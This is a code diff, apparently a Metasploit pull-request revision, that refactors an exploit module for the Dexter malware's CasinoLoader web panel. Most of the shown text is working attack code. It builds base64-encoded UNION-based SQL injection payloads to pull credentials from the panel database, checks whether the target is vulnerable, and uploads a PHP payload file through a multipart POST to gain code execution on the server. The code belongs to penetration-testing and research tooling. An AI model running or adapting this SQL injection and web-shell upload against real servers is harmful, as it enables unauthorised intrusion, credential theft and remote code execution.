Applied changes from @wchen-r7's comments

modules/exploits/multi/http/dexter_casinoloader_exec.rb

@@ -4,7 +4,6 @@
 ##
 
 require 'msf/core'
-require 'base64'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -26,10 +25,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'bwall (Brian Wallace) <bwallace[at]cylance.com'
+          'bwall (Brian Wallace) <bwallace[at]cylance.com>'
         ],
       'References'     =>
         [
+          ["Analysis", "http://www.xylibox.com/2013/08/point-of-sale-malware-infostealerdexter.html"]
         ],
       'Payload'        =>
         {
@@ -73,11 +73,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'=>gateway,
       'vars_post' => {
         'val' => 'AA==',
-        'page' => Base64.encode64("' AND 1=2 UNION ALL SELECT 1," + column + ",3 FROM " + table + " LIMIT 1 OFFSET " + row.to_s + " -- --")
+        'page' => Rex::Text.encode_base64("' AND 1=2 UNION ALL SELECT 1," + column + ",3 FROM " + table + " LIMIT 1 OFFSET " + row.to_s + " -- --")
       }
     })
     if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=')
-      return Base64.decode64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1]))[1..-3]
+      return Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1]))[1..-3]
     end
     return false
   end
@@ -89,20 +89,19 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'=>gateway,
       'vars_post' => {
         'val' => 'AA==',
-        'page' => Base64.encode64("' AND 1=2 UNION ALL SELECT 1,'" + testvalue + "',3 -- --")
+        'page' => Rex::Text.encode_base64("' AND 1=2 UNION ALL SELECT 1,'" + testvalue + "',3 -- --")
       }
-    }) # Check the base path for version regex
+    })
 
     if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=') and
-      Base64.decode64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1])) == '$' + testvalue + ';#' and database_get_field('users', 'name', 0) != false
-      return Exploit::CheckCode::Appears
+      Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1])) == '$' + testvalue + ';#' and database_get_field('users', 'name', 0) != false
+      return Exploit::CheckCode::Vulnerable
     end
     return Exploit::CheckCode::Safe
   end
 
 
   def exploit
-    peer = "#{rhost}:#{rport}"
     payload_name = rand_text_alpha(rand(10) + 5) + '.php'
 
     print_status("#{peer} - Using SQL injection to acquire credentials")
@@ -139,22 +138,16 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
 
-    boundary = Rex::Text.rand_text_hex(7)
-    post_data = "--#{boundary}\r\n"
-    post_data << "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n"
-    post_data << "MAX_FILE_SIZE\r\n"
-    post_data << "--#{boundary}\r\n"
-    post_data << "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"#{payload_name}\"\r\n\r\n"
-    post_data << "<?php "
-    post_data << payload.encoded
-    post_data << " ?>\r\n"
-    post_data << "--#{boundary}--\r\n"
+    data = Rex::MIME::Message.new
+    data.add_part("MAX_FILE_SIZE", nil, nil, 'form-data; name="MAX_FILE_SIZE"')
+    data.add_part("<?php #{payload.encoded} ?>", nil, nil, "form-data; name=\"uploadedfile\"; filename=\"#{payload_name}\"")
+    post_data = data.to_s
 
     print_status("#{peer} - Sending PHP payload (#{payload_name})")
     res = send_request_cgi({
         'method' => 'POST',
         'uri'    => upload,
-        'ctype'  => "multipart/form-data; boundary=#{boundary}",
+        'ctype'  => "multipart/form-data; boundary=#{data.bound}",
         'cookie' => login_cookie,
         'data'   => post_data
     })